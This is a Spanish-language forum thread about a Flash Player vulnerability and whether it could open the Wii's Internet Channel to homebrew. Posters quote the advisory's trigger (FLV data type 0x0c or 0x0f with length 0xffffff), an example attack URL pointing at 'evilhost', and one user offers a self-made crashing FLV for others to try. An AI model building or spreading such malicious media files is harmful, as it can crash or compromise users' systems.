Mmm posible exploit en wii?(creo que nuevo)

1, 2

fuente http://wii-news.dcemu.co.uk/

A security bulletin released 4 days ago by Adobe, tells us that the Flash Player used by the Internet Channel can be exploited to execute arbitrary code because of an input validation error in flash. This might be a opening for hackers to create some kind of homebrew launcher, and Nintendo has to pay to get a unaffected version of the Flash player from Adobe. This means that this security hole might not be patched as fast as the last one.


Que opinais de esto ¿?

Segun parece hay una vulnerabilidad en el reproductor flash de la wii que es el que segun dicen esta el posible exploit o agujero mediante el cual seria posible cargar homebrew...

Enlaza esa noticia a aqui:
http://www.adobe.com/support/security/bulletins/apsb07-12.html

¿Alguien sabe algo de esto?
Bueno no existe ningún exploit para Wii que explote esa vulnerabilidad que se han encontrado, y para que no haya confusión voy a cerrar el hilo.

Si a partir de esa vulverabilidad ya consiguen algo, nos encontraremos con la noticia. De todas formas, gracias por comentárnoslo.
El staff tras consultarlo hemos decidido reabrir el hilo, aunque como ha comentado cyberperez parece que por el momento no existe ninguna utilidad aunque si un posible camino.
Podríamos estar ante el paso del Homebrew o de retocar el firmware del lector... ya me parecía que el flashplayer de adobe no tuviera un agujero de seguridad, normalmente hay cientos de revisiones, lo raro que no se te actualice cuando conectes el opera, debería de ser automático...
debería de ser automático...


Casi prefiero que no.

Estaría genial que porfin se encontrara un agujero de seguridad en wii. A ver si siguen adelante.
Hola,

Vaya, bueno yo solo lo puse como informacion, y para que la gente lo supiera y fuera comentando cosas(no como anuncion de ¡Ya hay homebrew en wii! cosa que en ese caso si que deberia de haber sido cerrado. Ya que tambien lo vi en varios sitios, y creo que se podria comentar y que la gente estuviera al tanto, cuando lo vi cerrado la verdad es que me quede un poco...

La verdad como encuentren forma de hacer algo de homebrew con el operador opera con flash y cosas mola.

Una cuestion, si se descubriera un exploit y se consiguiera cargar homebrew mediante ese agujero, seria necesario luego chip para cargar cosas etc.. ¿? Lo digo porque yo del chip paso solo me interesa el homebrew, y el chip solo me lo pondria si consiguen cargar homebrew, pero si descubren el exploit y lo consiguen como digo, seria necesriao chip ¿?
Bueno, esperemos que de aqui hasta que se consiga el siguiente paso.., nintendo no tome medidas y nos fastidie con alguna actualizacion...
Para mi que desde ahora, voy a bloquear todas las actualizaciones que vengan por si acaso. Gran noticia
Un saludo.
Lo que esta claro es que el navegador wii si accede directamente al hard de la consola, por lo tanto no es descabellado pensar en que se pueda cargar soft por esta vía.
Como ejemplo las ultimas versiones del player de flash para windows que permiten interactuar con determinados perifericos del PC, como por ejemplo la webcam.
Se abre una puerta interesante y lo de bloquear las actualizaciones a partir de ahora parece mas que recomendable. Nunca se sabe......
Por lo que veo del error:

. A malicious SWF must be loaded in Flash Player by the user for an attacker to exploit these potential vulnerabilities


El código sería cargado através del navegador, por lo que ni se necesitaría chip. Supongo que permitiría cargar el programa en cuestión en ram, y permitiría ejecutarlo saltándonos todas las restricciones que hay actualmente. Es solo un suponer, pero tiene buena pinta.
nuvalo escribió:Por lo que veo del error:



El código sería cargado através del navegador, por lo que ni se necesitaría chip. Supongo que permitiría cargar el programa en cuestión en ram, y permitiría ejecutarlo saltándonos todas las restricciones que hay actualmente. Es solo un suponer, pero tiene buena pinta.


Lo malo que no dicen cual es el fallo... :?
No hay exploit publico.

Teoricamente, estan dandose prisa en solucionarlo porque es un fallo muy grave, un SWF cargado de fondo ni se notaria, y si puede ejcutar codigo arbitrario significa que puedes hacer de todo.

Ahora bien, supongo que no sera tan facil en la Wii, porque ejecutar codigo arbitrario requiere ejecutar codigo del cual se conoce la plataforma donde lo ejecutas, pero si puede ser una puerta.
Bueno yo creo que los beneficiados de esto solo serian los que hasta ahora no tienen instalado un modchip ya que puede hacer alguna utilidad para cargar backups o Homebrew, pero pienso yo, que no variaria tanto del hombrew en modo wii al modo gc ya que la potencia de la maquina es practicamente la misma en un modo y en otro, no es que vayamos a ver mejores emuladores ni nada de eso en todo caso un reproductor de video mas decente y soporte para el wiimote y la sd frontal en homebrew. Bueno nose yo pero hasta la fecha con el homebrew disponible y que funciona bajo modo gc estoy muy contento. Espero que me sorprendan si esto es cierto.
Y el Bluetooth, Wifi, Más del triple de RAM y el triple de CPU, triple de capacidad de almacenamiento, el mando, el nunchuk, etc...
Ya me dirás si merece o no la pena.
Mas RAM? mas CPU? ¿pero no se supone que es una game cube con mando ortopedico? X-D , Bueno si es asi bienvenido sea [plas]
Joe, lo que sería una gozada sería cargar los juegos desde un HD externo USB, pillar las películas de ahí tb, etc....
palote07 escribió:Podríamos estar ante el paso del Homebrew o de retocar el firmware del lector... ya me parecía que el flashplayer de adobe no tuviera un agujero de seguridad, normalmente hay cientos de revisiones, lo raro que no se te actualice cuando conectes el opera, debería de ser automático...


la wii no tiene firmaware del lector, olvidate ya de eso ;)
darkelphos escribió:
la wii no tiene firmaware del lector, olvidate ya de eso ;)


Todos los lectores llevan firmware. Otra cosa es que saquen o no actualizaciones o que estas sean transparentes y nosotros no seamos conscientes de que se están produciendo al actualizar la consola.
Es curioso como una vulnerabilidad que produce el cuelgue del kernel de linux, haga lo mismo con la wii en modo opera.

Quizás no sea una plataforma tan desconocida :)
Dios, cargar juegos por HDD USB seria la bomba, no habia caido en eso [plas]
Es curioso como una vulnerabilidad que produce el cuelgue del kernel de linux, haga lo mismo con la wii en modo opera.


Hombre, lo que produce el cuelgue es que permita saltar a una dirección de memoria del programa no válida, y como no hay instrucciones correctas se cuelga. Pero eso pasa en cualquier plataforma, al fin y al cabo las consolas son como un ordenador mucho más sencillo, y con firma digital...
No sé, pero supongo que ese código que se ejecutaría no debería de estar firmado, ya que se coloca directamente en ram, y me extrañaría mucho que fuera necesario encriptarlo.

Si se pudiera crear un programa que leyera/escribiera en la flash, con todo desencriptado, ya la bomba vamos. Ni infectus ni leches para modificar.

En fin, por soñar [fies]
El problema de esto es que igual que podria encontrarse una via para el homebrew, tambien podrian hacer aplicaciones dañinas que nos podrian encasquetar en cualquier sitio sin que nos diesemos cuenta...
Eso siempre pasa cuando se puede ejecutar codigo sin firmar, solo hay que tener un poco de vista y bajarse las cosas de sitios de confianza :D
me parece increible, me he leido todo el hilo y no decis kien es el qe se encarga d lo dl exploit, DarkFader(conocidisimo exEOLiano)creador dl mitico pisapeles

salu2
Hacemos apuestas de cuanto van a tardar en sacar una web que cruja la Wii?
haber si hay surte y le sakamos mas rendimiento a la blankita
me parece increible, me he leido todo el hilo y no decis kien es el qe se encarga d lo dl exploit, DarkFader


JARLLL??? ein? donde has visto eso? Por lo que se, aún no se está trabajando en nada, al menos para la wii. Si eso es cierto, ya podemos ir actualizando el flash player del pc.
DarkFader es EX-EOLiano????

No tenía ni idea de eso O_O
Según leo ahí sí que especifican cuál es el fallo. Lo que no dan es el flv que han usado para probar dicha vulnerabilidad.

Si no lo he entendido mal, vamos...
By supplying a data type of 0x0c or 0x0f and then setting the length
to the highest values (0xffffff) the client interpreter could
crash or execute arbitrary code:


Lo que quiere decir que aportando un tipo de dato 0x0c o 0x0f y poniendo la longitud en el valor máximo 0xffffff el interprete puede escacharrarse o ejecutar codigo arbitrario.

Más tarde indica lo siguiente como ejemplo de exploit:

Example of abusing this vulnerability by exploiting a remote
swf player:

http://videoplayerhost.tld?flvUrl=http://evilhost/flvmovie.flv

The trusted web video player will open the file crashing the user's
browser or executing the code supplied by the attacker.


No parece indicar un flv válido para ejecutar el exploit, pero sí que parece indicar como crearlo (aunque no tengo ni idea de cómo)
Bueno, tengo el FLV y el Flash... pero no quiero meterlo en la Wii por si se jode. Lo hice según el manual de esa página que habeis puesto (http://www.mindedsecurity.com/en/labs/advisories/flash_remote_flv_exec) donde se indica como crear la rotura del flashplayer pero no te deja descargar el exploit.

Lo he probado en mi PC pero como tengo el flash 9 no me pasa nada, se lo traga directamente y aparece el video. De momento no tiene la opción de inyectar código porque no se ni como se puede hacer eso, pero según pone es por medio de una URL o no se que.

Si alguien lo quiere y tiene un hosting o donde alojarlo para que la gente lo pruebe online ... ya sabe por Mensaje Privado lo paso...

Añado la imagen que me sale al ejecutarlo:

Imagen
Los de SONY actualizando firmwares y los de NINTENDO (Opera en este caso) actualizando el navegador, que cutrez Dios... viva la scene [666]
Bueno, malas noticias:

El Bug no afecta al Flash Player de Wii.
ddf escribió:Bueno, malas noticias:

El Bug no afecta al Flash Player de Wii.
Fuente?
CyBeR PeReZ escribió:Fuente?


palote07 escribió:Imagen


esa imagen aunque muchos piensen lo contrario, confirma que no es explotable ;) la explicacion tecnica es muy complicada...
segun la info del boletin de adobe ese problema lo tiene las versiones 7.0.69.0 y anteriories de flash player... y segun veo gente que tiene ya la 7.0.70.0 (segun yo lo tienen personas que compraron el canal de internet)
seria bueno que las personas que tienen el beta checara que version tiene y ver si presentan esa pantalla .. y tambien los que compraron el canal ( 7.0.70.0)..
davidc16mx escribió:segun la info del boletin de adobe ese problema lo tiene las versiones 7.0.69.0 y anteriories de flash player... y segun veo gente que tiene ya la 7.0.70.0 (segun yo lo tienen personas que compraron el canal de internet)
seria bueno que las personas que tienen el beta checara que version tiene y ver si presentan esa pantalla .. y tambien los que compraron el canal ( 7.0.70.0)..


Pues tienes razón, el navegador es la versión 7.0.70.0 porque actualicé a la versión final. No se porqué no lo copié a la tarjeta SD el anterior [buuuaaaa]

Si alguien quiere saber la versión de su navegador de Wii: http://www.adobe.com/products/flash/about/

Quien tenga una versión anterior que nos informe...
Yo tambien tengo la version 70 porque actualize en su dia el opera...

Aunque no se porque no es lo mismo la actualizacion del opera que la version del flash player.

Me refiero lo que tu actualizas es el navegador, pero el plugin del flash creo que lo cogera de algun sitio que se va actualizando o algo nose.

A ver si alguien que tenga el opera sin actualizar ni nada que version tiene.
Esto se va a convertir en un ... Y yo tambien.

Falta que alguien que guardara en su momento la beta pueda volverla a poner en su Wii, aunque me da en la nariz que no es posible sin formatear.
Por lo que veo en la página que explica el exploit este se da en un ocx generado para windows, es decir es código intel y gestión de memoria intel. (FLASH9B.OCX v9.0.28.0)

Este exploit se aprovecha del movimiento de un bloque de memoria excesivamente grande de una dirección a otra. Al pasarse en la longitud del bloque a mover se provoca un crash del sistema.

El procesador de la wii es un PPC y habría que ver si el código correspondiente del flashplayer para este procesador tambien presenta este error.

Alguien con un Mac y el navegador Opera en la versión correspondiente podría probar y ver si el error se reproduce.

No se si este exploit será finalmente aprovechable, lo que si creo es que nos abré un camino de investigación para poder encontrar una vulnerabilidad en el navegador.
En Minded Security no lo han probado con Mac, sin embargo el boletin de Adobe dice que se el error se da en todas las plataformas (quizá lo digan por taparse las espaldas quien sabe)
Coñe, ahora que decis, yo me guarde datos de los savegames del wiisports y el canal opera en su priemra version, voy a buscarlo XDD

Por cierto en que acababan los ficheros, o carpetas o algo, es que buscarlo en los 300gb que tengo no se XD
Yo tengo un mac pero no tiene procesador PPC sino intel
Xaxoxaxin escribió:Coñe, ahora que decis, yo me guarde datos de los savegames del wiisports y el canal opera en su priemra version, voy a buscarlo XDD

Por cierto en que acababan los ficheros, o carpetas o algo, es que buscarlo en los 300gb que tengo no se XD


Cuando lo tengas mira a ver que versión de flash es la que tiene. Como funcione... va a ser apoteósico [plas]
Yo no he actualizado nunca el navegador, pero si el Firmware de la Wii.

Esta nocie miro a ver si tengo la version antigua del flash.
Lo encontre tengo esto:

private\wii\title\HADP\content.bin

Y eso ocupa 28,6 MB (30.069.632 bytes) y es del 12 de enero, supongo que esto sera el opera no ¿?

Luego tengo otro que es:

private\wii\title\RSPP\data.bin

Con la misma fecha, pero solo son 190kb.

Alguien sabe el proceso de como paasrlo a la wii ¿? no kiero joderla y que se me cuelgue XD

Vamos que yo me acuerdo que me lo guarde todo en la SD, los saves del wiisports de puntuaicones, el navegador, etc...

Por lo que supongo que estara en ese content.bin, ahora riesgo de que se joda al meter una version vieja o algo ¿?....

Casi estoy por esperarme, a que alguna persona que tenga una version anterior si la tiene lo pruebe, no sea cosa que lo ponga y siga teniendo la 70 porque la version de flash de la wii no vaya con el opera sino que el plugin va con otra cosa o algo y la cage para nada.
La carpeta HADP es el navegador, la otra, RSPP, son los datos del wiiSports.
El que quiera probar aquí he subido el video, si le dais directamente y no habeis actualizado a la ultima versión, ya sea Windows, Mac o Linux, se os colgará el PC. Si es desde la Wii, pues no se lo que hará hasta que alguien lo pruebe.

http://usuarios.lycos.es/palote07/
Coño pues yo pensaba que era al reves, por lo que ocupaba.

Entonces la anterior version del navegador son solo 190kb ¿? uh ¿?

Pues bueno a ver que dice la gente que tiene el navegador antiguo, si se confirma que es una version anteriro a la 70 la pongo.

Aunque no se porque me da que el plugin del flash no ira junto con la version del opera. sino con el firmware de la consola, o a parte de alguna otra manera.
Xaxoxaxin escribió:Coño pues yo pensaba que era al reves, por lo que ocupaba.

Entonces la anterior version del navegador son solo 190kb ¿? uh ¿?

Pues bueno a ver que dice la gente que tiene el navegador antiguo, si se confirma que es una version anteriro a la 70 la pongo.

Aunque no se porque me da que el plugin del flash no ira junto con la version del opera. sino con el firmware de la consola, o a parte de alguna otra manera.


No no, es la de 28 megas. La grande.

Si quieres ver lo del navegador como meter y volver a poner canales y todas esas cosas en el manual de la Wii viene bien explicado. Solo tienes que copiar lo que tengas en la tarjeta SD a tu PC, luego formateas la tarjeta SD, la metes en la Wii y copias el canal Opera la versión final la que tienes a la tarjeta SD, y despues lo borras de los canales (eso viene explicado en el manual de la Wii), no hay que formatear la Wii.

Luego despues lo copias de la SD al PC y luego metes el antiguo en la SD, y lo copias a la Wii y ya lo tienes terminado.
97 respuestas
1, 2